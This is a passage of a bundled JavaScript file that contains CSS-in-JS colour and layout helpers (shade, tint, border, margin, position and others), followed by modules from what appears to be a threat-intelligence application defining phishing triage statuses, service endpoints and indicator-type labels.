  }));
} // prettier-ignore


var curriedSetSaturation =
/*#__PURE__*/
curry
/* ::<number | string, string, string> */
(setSaturation);

/**
 * Shades a color by mixing it with black. `shade` can produce
 * hue shifts, where as `darken` manipulates the luminance channel and therefore
 * doesn't produce hue shifts.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: shade(0.25, '#00f')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${shade(0.25, '#00f')};
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "#00003f";
 * }
 */

function shade(percentage, color) {
  return curriedMix(parseFloat(percentage), 'rgb(0, 0, 0)', color);
} // prettier-ignore


var curriedShade =
/*#__PURE__*/
curry
/* ::<number | string, string, string> */
(shade);

/**
 * Tints a color by mixing it with white. `tint` can produce
 * hue shifts, where as `lighten` manipulates the luminance channel and therefore
 * doesn't produce hue shifts.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: tint(0.25, '#00f')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${tint(0.25, '#00f')};
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "#bfbfff";
 * }
 */

function tint(percentage, color) {
  return curriedMix(parseFloat(percentage), 'rgb(255, 255, 255)', color);
} // prettier-ignore


var curriedTint =
/*#__PURE__*/
curry
/* ::<number | string, string, string> */
(tint);

/**
 * Decreases the opacity of a color. Its range for the amount is between 0 to 1.
 *
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: transparentize(0.1, '#fff');
 *   background: transparentize(0.2, 'hsl(0, 0%, 100%)'),
 *   background: transparentize('0.5', 'rgba(255, 0, 0, 0.8)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${transparentize(0.1, '#fff')};
 *   background: ${transparentize(0.2, 'hsl(0, 0%, 100%)')},
 *   background: ${transparentize('0.5', 'rgba(255, 0, 0, 0.8)')},
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "rgba(255,255,255,0.9)";
 *   background: "rgba(255,255,255,0.8)";
 *   background: "rgba(255,0,0,0.3)";
 * }
 */

function transparentize(amount, color) {
  var parsedColor = parseToRgb(color);
  var alpha = typeof parsedColor.alpha === 'number' ? parsedColor.alpha : 1;

  var colorWithAlpha = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, parsedColor, {
    alpha: guard(0, 1, (alpha * 100 - parseFloat(amount) * 100) / 100)
  });

  return rgba(colorWithAlpha);
} // prettier-ignore


var curriedTransparentize =
/*#__PURE__*/
curry
/* ::<number | string, string, string> */
(transparentize);

/**
 * Shorthand for easily setting the animation property. Allows either multiple arrays with animations
 * or a single animation spread over the arguments.
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...animation(['rotate', '1s', 'ease-in-out'], ['colorchange', '2s'])
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${animation(['rotate', '1s', 'ease-in-out'], ['colorchange', '2s'])}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'animation': 'rotate 1s ease-in-out, colorchange 2s'
 * }
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...animation('rotate', '1s', 'ease-in-out')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${animation('rotate', '1s', 'ease-in-out')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'animation': 'rotate 1s ease-in-out'
 * }
 */
function animation() {
  for (var _len = arguments.length, args = new Array(_len), _key = 0; _key < _len; _key++) {
    args[_key] = arguments[_key];
  }

  // Allow single or multiple animations passed
  var multiMode = Array.isArray(args[0]);

  if (!multiMode && args.length > 8) {
    throw new Error('The animation shorthand only takes 8 arguments. See the specification for more information: http://mdn.io/animation');
  }

  var code = args.map(function (arg) {
    if (multiMode && !Array.isArray(arg) || !multiMode && Array.isArray(arg)) {
      throw new Error("To pass multiple animations please supply them in arrays, e.g. animation(['rotate', '2s'], ['move', '1s'])\nTo pass a single animation please supply them in simple values, e.g. animation('rotate', '2s')");
    }

    if (Array.isArray(arg) && arg.length > 8) {
      throw new Error('The animation shorthand arrays can only have 8 elements. See the specification for more information: http://mdn.io/animation');
    }

    return Array.isArray(arg) ? arg.join(' ') : arg;
  }).join(', ');
  return {
    animation: code
  };
}

/**
 * Shorthand that accepts any number of backgroundImage values as parameters for creating a single background statement.
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...backgroundImages('url("/image/background.jpg")', 'linear-gradient(red, green)')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${backgroundImages('url("/image/background.jpg")', 'linear-gradient(red, green)')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'backgroundImage': 'url("/image/background.jpg"), linear-gradient(red, green)'
 * }
 */
function backgroundImages() {
  for (var _len = arguments.length, properties = new Array(_len), _key = 0; _key < _len; _key++) {
    properties[_key] = arguments[_key];
  }

  return {
    backgroundImage: properties.join(', ')
  };
}

/**
 * Shorthand that accepts any number of background values as parameters for creating a single background statement.
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...backgrounds('url("/image/background.jpg")', 'linear-gradient(red, green)', 'center no-repeat')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${backgrounds('url("/image/background.jpg")', 'linear-gradient(red, green)', 'center no-repeat')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'background': 'url("/image/background.jpg"), linear-gradient(red, green), center no-repeat'
 * }
 */
function backgrounds() {
  for (var _len = arguments.length, properties = new Array(_len), _key = 0; _key < _len; _key++) {
    properties[_key] = arguments[_key];
  }

  return {
    background: properties.join(', ')
  };
}

var sideMap = ['top', 'right', 'bottom', 'left'];
/**
 * Shorthand for the border property that splits out individual properties for use with tools like Fela and Styletron. A side keyword can optionally be passed to target only one side's border properties.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...border('1px', 'solid', 'red')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${border('1px', 'solid', 'red')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'borderColor': 'red',
 *   'borderStyle': 'solid',
 *   'borderWidth': `1px`,
 * }
 *
 * // Styles as object usage
 * const styles = {
 *   ...border('top', '1px', 'solid', 'red')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${border('top', '1px', 'solid', 'red')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'borderTopColor': 'red',
 *   'borderTopStyle': 'solid',
 *   'borderTopWidth': `1px`,
 * }
 */

function border(sideKeyword) {
  for (var _len = arguments.length, values = new Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    values[_key - 1] = arguments[_key];
  }

  if (typeof sideKeyword === 'string' && sideMap.indexOf(sideKeyword) >= 0) {
    var _ref;

    return _ref = {}, _ref["border" + capitalizeString(sideKeyword) + "Width"] = values[0], _ref["border" + capitalizeString(sideKeyword) + "Style"] = values[1], _ref["border" + capitalizeString(sideKeyword) + "Color"] = values[2], _ref;
  } else {
    values.unshift(sideKeyword);
    return {
      borderWidth: values[0],
      borderStyle: values[1],
      borderColor: values[2]
    };
  }
}

/**
 * Shorthand that accepts a value for side and a value for radius and applies the radius value to both corners of the side.
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...borderRadius('top', '5px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${borderRadius('top', '5px')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'borderTopRightRadius': '5px',
 *   'borderTopLeftRadius': '5px',
 * }
 */
function borderRadius(side, radius) {
  var uppercaseSide = capitalizeString(side);

  if (!radius && radius !== 0) {
    throw new Error('borderRadius expects a radius value as a string or number as the second argument.');
  }

  if (uppercaseSide === 'Top' || uppercaseSide === 'Bottom') {
    var _ref;

    return _ref = {}, _ref["border" + uppercaseSide + "RightRadius"] = radius, _ref["border" + uppercaseSide + "LeftRadius"] = radius, _ref;
  }

  if (uppercaseSide === 'Left' || uppercaseSide === 'Right') {
    var _ref2;

    return _ref2 = {}, _ref2["borderTop" + uppercaseSide + "Radius"] = radius, _ref2["borderBottom" + uppercaseSide + "Radius"] = radius, _ref2;
  }

  throw new Error('borderRadius expects one of "top", "bottom", "left" or "right" as the first argument.');
}

/**
 * Shorthand that accepts up to four values, including null to skip a value, and maps them to their respective directions.
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...borderStyle('solid', 'dashed', 'dotted', 'double')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${borderStyle('solid', 'dashed', 'dotted', 'double')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'borderTopStyle': 'solid',
 *   'borderRightStyle': 'dashed',
 *   'borderBottomStyle': 'dotted',
 *   'borderLeftStyle': 'double'
 * }
 */
function borderStyle() {
  for (var _len = arguments.length, values = new Array(_len), _key = 0; _key < _len; _key++) {
    values[_key] = arguments[_key];
  }

  return directionalProperty.apply(void 0, ['borderStyle'].concat(values));
}

/**
 * Shorthand that accepts up to four values, including null to skip a value, and maps them to their respective directions.
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...borderWidth('12px', '24px', '36px', '48px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${borderWidth('12px', '24px', '36px', '48px')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'borderTopWidth': '12px',
 *   'borderRightWidth': '24px',
 *   'borderBottomWidth': '36px',
 *   'borderLeftWidth': '48px'
 * }
 */
function borderWidth() {
  for (var _len = arguments.length, values = new Array(_len), _key = 0; _key < _len; _key++) {
    values[_key] = arguments[_key];
  }

  return directionalProperty.apply(void 0, ['borderWidth'].concat(values));
}

function generateSelectors(template, state) {
  var stateSuffix = state ? ":" + state : '';
  return template(stateSuffix);
}
/**
 * Function helper that adds an array of states to a template of selectors. Used in textInputs and buttons.
 * @private
 */


function statefulSelectors(states, template, stateMap) {
  if (!template) throw new Error('You must provide a template to this method.');
  if (states.length === 0) return generateSelectors(template, null);
  var selectors = [];

  for (var i = 0; i < states.length; i += 1) {
    if (stateMap && stateMap.indexOf(states[i]) < 0) {
      throw new Error('You passed an unsupported selector state to this method.');
    }

    selectors.push(generateSelectors(template, states[i]));
  }

  selectors = selectors.join(',');
  return selectors;
}

var stateMap = [undefined, null, 'active', 'focus', 'hover'];

function template(state) {
  return "button" + state + ",\n  input[type=\"button\"]" + state + ",\n  input[type=\"reset\"]" + state + ",\n  input[type=\"submit\"]" + state;
}
/**
 * Populates selectors that target all buttons. You can pass optional states to append to the selectors.
 * @example
 * // Styles as object usage
 * const styles = {
 *   [buttons('active')]: {
 *     'border': 'none'
 *   }
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   > ${buttons('active')} {
 *     border: none;
 *   }
 * `
 *
 * // CSS in JS Output
 *
 *  'button:active,
 *  'input[type="button"]:active,
 *  'input[type=\"reset\"]:active,
 *  'input[type=\"submit\"]:active: {
 *   'border': 'none'
 * }
 */


function buttons() {
  for (var _len = arguments.length, states = new Array(_len), _key = 0; _key < _len; _key++) {
    states[_key] = arguments[_key];
  }

  return statefulSelectors(states, template, stateMap);
}

/**
 * Shorthand that accepts up to four values, including null to skip a value, and maps them to their respective directions.
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...margin('12px', '24px', '36px', '48px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${margin('12px', '24px', '36px', '48px')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'marginTop': '12px',
 *   'marginRight': '24px',
 *   'marginBottom': '36px',
 *   'marginLeft': '48px'
 * }
 */
function margin() {
  for (var _len = arguments.length, values = new Array(_len), _key = 0; _key < _len; _key++) {
    values[_key] = arguments[_key];
  }

  return directionalProperty.apply(void 0, ['margin'].concat(values));
}

/**
 * Shorthand that accepts up to four values, including null to skip a value, and maps them to their respective directions.
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...padding('12px', '24px', '36px', '48px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${padding('12px', '24px', '36px', '48px')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'paddingTop': '12px',
 *   'paddingRight': '24px',
 *   'paddingBottom': '36px',
 *   'paddingLeft': '48px'
 * }
 */
function padding() {
  for (var _len = arguments.length, values = new Array(_len), _key = 0; _key < _len; _key++) {
    values[_key] = arguments[_key];
  }

  return directionalProperty.apply(void 0, ['padding'].concat(values));
}

var positionMap$1 = ['absolute', 'fixed', 'relative', 'static', 'sticky'];
/**
 * Shorthand accepts up to five values, including null to skip a value, and maps them to their respective directions. The first value can optionally be a position keyword.
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...position('12px', '24px', '36px', '48px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${position('12px', '24px', '36px', '48px')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'top': '12px',
 *   'right': '24px',
 *   'bottom': '36px',
 *   'left': '48px'
 * }
 *
 * // Styles as object usage
 * const styles = {
 *   ...position('absolute', '12px', '24px', '36px', '48px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${position('absolute', '12px', '24px', '36px', '48px')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'position': 'absolute',
 *   'top': '12px',
 *   'right': '24px',
 *   'bottom': '36px',
 *   'left': '48px'
 * }
 */

function position(positionKeyword) {
  for (var _len = arguments.length, values = new Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    values[_key - 1] = arguments[_key];
  }

  if (positionMap$1.indexOf(positionKeyword) >= 0) {
    return Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({
      position: positionKeyword
    }, directionalProperty.apply(void 0, [''].concat(values)));
  } else {
    var firstValue = positionKeyword; // in this case position is actually the first value

    return directionalProperty.apply(void 0, ['', firstValue].concat(values));
  }
}

/**
 * Shorthand to set the height and width properties in a single statement.
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...size('300px', '250px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${size('300px', '250px')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'height': '300px',
 *   'width': '250px',
 * }
 */
function size(height, width) {
  if (width === void 0) {
    width = height;
  }

  return {
    height: height,
    width: width
  };
}

var stateMap$1 = [undefined, null, 'active', 'focus', 'hover'];

function template$1(state) {
  return "input[type=\"color\"]" + state + ",\n    input[type=\"date\"]" + state + ",\n    input[type=\"datetime\"]" + state + ",\n    input[type=\"datetime-local\"]" + state + ",\n    input[type=\"email\"]" + state + ",\n    input[type=\"month\"]" + state + ",\n    input[type=\"number\"]" + state + ",\n    input[type=\"password\"]" + state + ",\n    input[type=\"search\"]" + state + ",\n    input[type=\"tel\"]" + state + ",\n    input[type=\"text\"]" + state + ",\n    input[type=\"time\"]" + state + ",\n    input[type=\"url\"]" + state + ",\n    input[type=\"week\"]" + state + ",\n    input:not([type])" + state + ",\n    textarea" + state;
}
/**
 * Populates selectors that target all text inputs. You can pass optional states to append to the selectors.
 * @example
 * // Styles as object usage
 * const styles = {
 *   [textInputs('active')]: {
 *     'border': 'none'
 *   }
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   > ${textInputs('active')} {
 *     border: none;
 *   }
 * `
 *
 * // CSS in JS Output
 *
 *  'input[type="color"]:active,
 *  input[type="date"]:active,
 *  input[type="datetime"]:active,
 *  input[type="datetime-local"]:active,
 *  input[type="email"]:active,
 *  input[type="month"]:active,
 *  input[type="number"]:active,
 *  input[type="password"]:active,
 *  input[type="search"]:active,
 *  input[type="tel"]:active,
 *  input[type="text"]:active,
 *  input[type="time"]:active,
 *  input[type="url"]:active,
 *  input[type="week"]:active,
 *  input:not([type]):active,
 *  textarea:active': {
 *   'border': 'none'
 * }
 */


function textInputs() {
  for (var _len = arguments.length, states = new Array(_len), _key = 0; _key < _len; _key++) {
    states[_key] = arguments[_key];
  }

  return statefulSelectors(states, template$1, stateMap$1);
}

/**
 * Accepts any number of transition values as parameters for creating a single transition statement. You may also pass an array of properties as the first parameter that you would like to apply the same tranisition values to (second parameter).
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...transitions('opacity 1.0s ease-in 0s', 'width 2.0s ease-in 2s'),
 *   ...transitions(['color', 'background-color'], '2.0s ease-in 2s')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${transitions('opacity 1.0s ease-in 0s', 'width 2.0s ease-in 2s')};
 *   ${transitions(['color', 'background-color'], '2.0s ease-in 2s'),};
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'transition': 'opacity 1.0s ease-in 0s, width 2.0s ease-in 2s'
 *   'transition': 'color 2.0s ease-in 2s, background-color 2.0s ease-in 2s',
 * }
 */
function transitions() {
  for (var _len = arguments.length, properties = new Array(_len), _key = 0; _key < _len; _key++) {
    properties[_key] = arguments[_key];
  }

  if (Array.isArray(properties[0]) && properties.length === 2) {
    var value = properties[1];

    if (typeof value !== 'string') {
      throw new Error('Property must be a string value.');
    }

    var transitionsString = properties[0].map(function (property) {
      return property + " " + value;
    }).join(', ');
    return {
      transition: transitionsString
    };
  } else {
    return {
      transition: properties.join(', ')
    };
  }
}

// Helpers




/***/ }),
/* 875 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__components__ = __webpack_require__(3514);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__components__["a"]; });
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_0__components__["b"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__constants__ = __webpack_require__(3515);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_1__constants__; });




/***/ }),
/* 876 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__ToggleFeature__ = __webpack_require__(3676);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_0__ToggleFeature__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__ToggleFeatureView__ = __webpack_require__(3677);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_1__ToggleFeatureView__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__FeatureNotEnabledView__ = __webpack_require__(1492);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_2__FeatureNotEnabledView__["a"]; });




/***/ }),
/* 877 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return PHISHING_SCORE_VALUES; });
/* unused harmony export TRIAGE_STATUSES */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return TRIAGE_STATUSES_TO_NAMES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return TRIAGE_STATUS_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return PHISHING_STATUS_OPTIONS; });
/* unused harmony export SUMMARY_SERVICE_ENDPOINT */
/* unused harmony export REPORT_METADATA_SERVICE_ENDPOINT */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return REPORTS_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return TRIAGE_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DOWNLOAD_INDICATOR_CSV_ENDPOINT; });
/* unused harmony export PHISHING_INDICATORS_CSV_FILENAME */


// TODO Reorder names, backwards
var PHISHING_SCORE_VALUES = {
  UNRESOLVED: 'UNRESOLVED',
  CONFIRMED: 'CONFIRMED',
  IGNORED: 'IGNORED'
};

var TRIAGE_STATUSES = {
  UNKNOWN: -1,
  BENIGN: 0,
  LOW: 1,
  MEDIUM: 2,
  HIGH: 3
};

var TRIAGE_STATUSES_TO_NAMES = {
  '-1': 'UNKNOWN',
  '0': 'BENIGN',
  '1': 'LOW',
  '2': 'MEDIUM',
  '3': 'HIGH'
};

var TRIAGE_STATUS_OPTIONS = Object.values(TRIAGE_STATUSES);
var PHISHING_STATUS_OPTIONS = Object.values(PHISHING_SCORE_VALUES);

var SUMMARY_SERVICE_ENDPOINT = '/services/entity-reports/summaries';
var REPORT_METADATA_SERVICE_ENDPOINT = ' /services/incident-reports/metadata/v2';

var REPORTS_ENDPOINT = '/services/incident-reports';
var TRIAGE_ENDPOINT = '/services/triage/submissions';

var DOWNLOAD_INDICATOR_CSV_ENDPOINT = '/services/triage/export-indicators.csv';
var PHISHING_INDICATORS_CSV_FILENAME = 'phishing-report.csv';

/***/ }),
/* 878 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(3422);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__constants_js__ = __webpack_require__(3423);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__constants_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1__constants_js__);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "constants", function() { return __WEBPACK_IMPORTED_MODULE_1__constants_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_js__ = __webpack_require__(763);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "utils", function() { return __WEBPACK_IMPORTED_MODULE_2__utils_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__getters_js__ = __webpack_require__(1415);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_3__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__stores_js__ = __webpack_require__(3424);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_4__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__epics_js__ = __webpack_require__(3425);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_5__epics_js__["a"]; });












/***/ }),
/* 879 */,
/* 880 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return INCIDENT_REPORT_TYPE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return INDICATOR_TAG; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return INDICATOR_TYPE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return INDICATOR_TYPES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return convertIndicatorTypeToLabel; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return getIndicatorLabel; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return getIndicatorDisplayValue; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return Note; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_ramda__);




var INCIDENT_REPORT_TYPE = 'INCIDENT_REPORT';
var INDICATOR_TAG = 'INDICATOR_TAG';
var INDICATOR_TYPE = 'INDICATOR';
var INDICATOR_TYPES = {
  IP: 'IP',
  MD5: 'MD5',
  SHA1: 'SHA1',
  SHA256: 'SHA256',
  DOMAIN: 'DOMAIN',
  FQDN: 'FQDN',
  URL: 'URL',
  CVE: 'CVE',
  EMAIL_ADDRESS: 'EMAIL_ADDRESS',
  LOCATION: 'LOCATION',
  SOFTWARE: 'SOFTWARE',
  FILE: 'FILE',
  PERSON: 'PERSON',
  ORGANIZATION: 'ORGANIZATION',
  MALWARE: 'MALWARE',
  REGISTRY_KEY: 'REGISTRY_KEY',
  DATE: 'DATE',
  BITCOIN_ADDRESS: 'BITCOIN_ADRESS',
  CIDR_BLOCK: 'CIDR_BLOCK',
  PHONE_NUMBER: 'PHONE_NUMBER',
  X_ID: 'X_ID',
  THREAT_ACTOR: 'THREAT_ACTOR'
};

var convertIndicatorTypeToLabel = function convertIndicatorTypeToLabel(indicatorType) {
  switch (indicatorType) {
    case INDICATOR_TYPES.IP:
      return 'IP';
    case INDICATOR_TYPES.EMAIL_ADDRESS:
      return 'Email Address';
    case INDICATOR_TYPES.DOMAIN:
      return 'Domain';
    case INDICATOR_TYPES.SOFTWARE:
      return 'Software';
    case INDICATOR_TYPES.LOCATION:
      return 'Location';
    case INDICATOR_TYPES.FILE:
      return 'File';
    case INDICATOR_TYPES.PERSON:
      return 'Person';
    case INDICATOR_TYPES.ORGANIZATION:
      return 'Organization';
    case INDICATOR_TYPES.REGISTRY_KEY:
      return 'Registry Key';
    case INDICATOR_TYPES.DATE:
      return 'Date';
    case INDICATOR_TYPES.BITCOIN_ADDRESS:
      return 'Bitcoin Address';
    case INDICATOR_TYPES.CIDR_BLOCK:
      return 'CIDR Block';
    case INDICATOR_TYPES.PHONE_NUMBER:
      return 'Phone Number';
    case INDICATOR_TYPES.X_ID:
      return 'X ID';
    case INDICATOR_TYPES.THREAT_ACTOR:
      return 'THREAT_ACTOR';
    default:
      return indicatorType;
  }
};

/**
 * node -> display label for node
 */
var getIndicatorLabel = Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["pipe"])(function (x) {
  return x.get('type');
}, convertIndicatorTypeToLabel);

/**
 * Handle some custom uppwercasing logic around CVEs
 */
var getIndicatorDisplayValue = function getIndicatorDisplayValue(node) {
  var label = getIndicatorLabel(node);
  var value = node.get('value', '');
  return label === 'CVE' ? Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["toUpper"])(value) : value;
};

var Note = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  guid: '', // The id of this record
  nodeGuid: '', // The id of the graph node this note relates to
  userGuid: '', // The id of the user who authored this note
  created: -1, // Created timestamp
  updated: -1, // Updated timestamp
  note: '', // The raw, stringified JSON content state (result fo NoteIso.to)
  editorState: null // The editor state, which only ever exists client side and is sent into the draft editor
});

/***/ }),
/* 881 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(778);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(779);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores__ = __webpack_require__(3253);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(3254);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 882 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return currentTimeZone; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return resolveSummaryEndpoint; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return normalizeSummary; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return formatLogicalTypeValue; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return isSummaryEmpty; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__types__ = __webpack_require__(301);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_moment_timezone__ = __webpack_require__(214);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_moment_timezone___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_moment_timezone__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_jstz__ = __webpack_require__(494);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_jstz___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_jstz__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_summaries_constants__ = __webpack_require__(404);






